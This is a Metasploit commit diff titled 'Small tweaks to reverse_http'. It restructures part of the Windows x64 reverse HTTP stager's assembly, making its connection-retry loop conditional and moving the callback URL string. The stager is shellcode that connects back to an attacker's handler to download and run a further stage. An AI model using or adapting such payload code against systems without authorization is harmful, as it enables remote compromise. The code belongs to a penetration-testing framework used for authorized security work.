Small tweaks to reverse_http

OJ · OJ · commit fd2534914d41 · 2015-05-20T12:15:38.000+10:00
diff --git a/lib/msf/core/payload/windows/x64/reverse_http.rb b/lib/msf/core/payload/windows/x64/reverse_http.rb
@@ -295,9 +295,8 @@ def asm_reverse_http(opts={})
     end
 
     asm << %Q^
-
-        jmp get_server_uri
-
+        call httpopenrequest
+        db "#{opts[:url]}",0x0
       httpopenrequest:
         mov rcx, rax                  ; hConnect
         push rbx
@@ -314,12 +313,17 @@ def asm_reverse_http(opts={})
 
       prepare:
         mov rsi, rax
-        push #{retry_count}
-        pop rdi
-
-      retryrequest:
     ^
 
+    if retry_count > 1
+      asm << %Q^
+          push #{retry_count}
+          pop rdi
+
+        retryrequest:
+      ^
+    end
+
     if opts[:ssl]
       asm << %Q^
       internetsetoption:
@@ -349,18 +353,20 @@ def asm_reverse_http(opts={})
         call rbp
         test eax, eax
         jnz allocate_memory
+    ^
 
+    if retry_count > 1
+      asm << %Q^
       try_it_again:
         dec rdi
         jz failure
         jmp retryrequest
-
-      get_server_uri:
-        call httpopenrequest
-
-      server_uri:
-        db "#{opts[:url]}",0x0
-    ^
+      ^
+    else
+      asm << %Q^
+        jmp failure
+      ^
+    end
 
     if opts[:exitfunk]
       asm << %Q^
